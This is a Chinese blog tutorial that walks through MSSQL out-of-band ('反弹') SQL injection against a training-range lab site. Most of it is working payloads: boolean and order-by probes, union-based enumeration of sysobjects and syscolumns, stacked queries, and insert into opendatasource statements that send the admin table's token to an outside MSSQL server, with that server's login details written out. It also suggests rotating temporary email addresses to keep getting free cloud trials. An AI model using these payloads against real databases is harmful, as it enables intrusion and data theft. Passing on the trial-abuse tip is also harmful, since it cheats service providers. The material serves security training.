当前位置：文江博客文章教程详情

MSSQL 注入 — 反弹注入

发布于 2025-12-03 02:46:44 字数 5436 浏览 3 评论 0

MSSQL 反弹注入原理

依靠 opendatasource 函数，把查询出的数据发送到 MSSQL 服务器上。

MSSQL 反弹注入使用场景

1631543108_613f5f4436301f8049c9b.png!small?1631543107075

用香港云快速搭建一个 MSSQL 环境

1631543346_613f603256f07ee1c38fa.png!small?1631543346163

可以用 临时邮箱 注册免费的试用 60 天。

免费 60 天的试用，过期了就换个邮箱。

MSSQL 反弹注入常见问题

1.猜数据时为什么不能用数字
根据了 MSSQL 的特性，虽然不能用数字但可用 null 和字母填充
2.MSSQL 有系统自带库吗
有为 master.dbo.sysdatabase
3.反弹注入满足的条件
能否堆叠查询，堆叠查询用;结束前一个语句，并执行下一个语句
4.为什么反弹注入开头不是 select?
因为反弹注入是在我们的 mssql 服务器上插入我们子查询报错信息的语句，所以用 insert into
5. xtype='U' 是什么？
设置查找用户建立的数据表
6.反弹注入使用情况
没有回显的注入，支持 opendatasource 函数
7.如何查询当前库名
select db_name()

MSSQL 反弹注入语句解析

insert into opendatasource('sqloledb','server=SQL5009.webweb.com,1433;uid=DB_14A5E44_zkaq_admin;pwd=zkaqzkaq;database=DB_14A5E44_zkaq').DB_14A5E44_zkaq.dbo.temp select * from admin --

Insert into 很明显是插入语句然后出现了个 opendatasource。

opendatasource 为了方便理解，可以看理解为 ‘使用 opendatasource 函数将当前数据库查询的结果发送到另一数据库服务器中。

语法：
OPENDATASOURCE(provider_name,init_string)
provider_name
注册为用于访问数据源的 OLE DB 提供程序的 PROGID 的名称 MSSQL 的名称为 SQLOLEDB
init_string
连接字符串
连接地址、端口、用户名、密码、数据库名
server=连接地址，端口;uid=用户名;pwd=密码;database=数据库名称

连接上服务器后选定数据表 DB_14A5E44_zkaq.dbo.temp 把后面语句的查询结果插入到那个表里面。

MSSQL 反弹注入靶场实战

1.判断注入点

http://o9pz8015.ia.aqlab.cn/?id=1%27and%20-1=-1--%20wqe 页面正常显示
http://o9pz8015.ia.aqlab.cn/?id=1%27and%20-1=-2--%20wqe 页面非正常显示

存在 SQL 注入。

2. 判断当前页面字段总数

http://o9pz8015.ia.aqlab.cn/?id=1%27and%20-1=-1 order by 3--%20wqe 页面正常显示
http://o9pz8015.ia.aqlab.cn/?id=1%27and%20-1=-1 order by 4--%20wqe 页面非正常显示

当前页面字段总数为 3。

3.利用 MSSQL 语句来进行查询

注意：MSSQL 联合查询需要使用 union all，并且有严格的类型要求。
不能和 Mysql 数据库一样查询可以输入 1，2，3，要对应类型来注入。
id=1'and -1=-1 union all select null,null,null -- qwe
id=1'and -1=-1 union all select 1,'b,'c' -- qwe
检测出数字类型 2 和 3 为字符串类型

1631883488_614490e0afbe80a679fa0.png!small?1631883487313

4.查表名

id=1'and -1=-1 union all select id ,'a',name from sysobjects where xtype='U' -- qwe

1631884012_614492ec847204c48be73.png!small?1631884011159

得到 news 表，admin 表和 dtproperties 表。

select name from sysobjects where xtype='U'；
xtype='U' ====》代表用户创建的表；
xtype='S' ====》代表系统自带的表。

5.查列名

记住我们需要的表对应的 id 值：1977058079；

用 syscolumns 来查看 admin 表里的字段。

id=1'and -1=-1 union all select id ,'a',name from syscolumns where id =1977058079 -- qwe

1631884823_614496171f58f095905f9.png!small?1631884821745

6.查字段内容（得到 FALG)

id=1'and -1=-1 union all select id ,'a',token from admin-- qwe

1631885006_614496cebb64b517e8de2.png!small?1631885005553

7.反弹注入获取 FALG

反弹注入条件需要满足能堆叠查询。

堆叠注入：在注入的时候可以用; (;代表语句的结束)

判断能否使用堆叠注入：

id=1';select 123-- qwe 页面显示正常，能使用堆叠注入

1631941169_6145723195442d022feb0.png!small?1631941169781

插入数据

id=1';insert into opendatasource('sqloledb','server=SQL5095.site4now.net,1433;uid=DB_14DC2E5_wlb_admin;pwd=123456789;database=DB_14DC2E5_wlb').DB_14DC2E5_wlb.dbo.teener select table_name from information_schema.tables-- qwe 页面显示正常，插入数据成功。

1631942234_6145765a84bc202c158c0.png!small?1631942234709

查询数据

';insert into opendatasource('sqloledb','server=SQL5095.site4now.net,1433;uid=DB_14DC2E5_wlb_admin;pwd=123456789;database=DB_14DC2E5_wlb').DB_14DC2E5_wlb.dbo.teener select token from admin-- qwe

1631942301_6145769d29b58c8281c18.png!small?1631942301268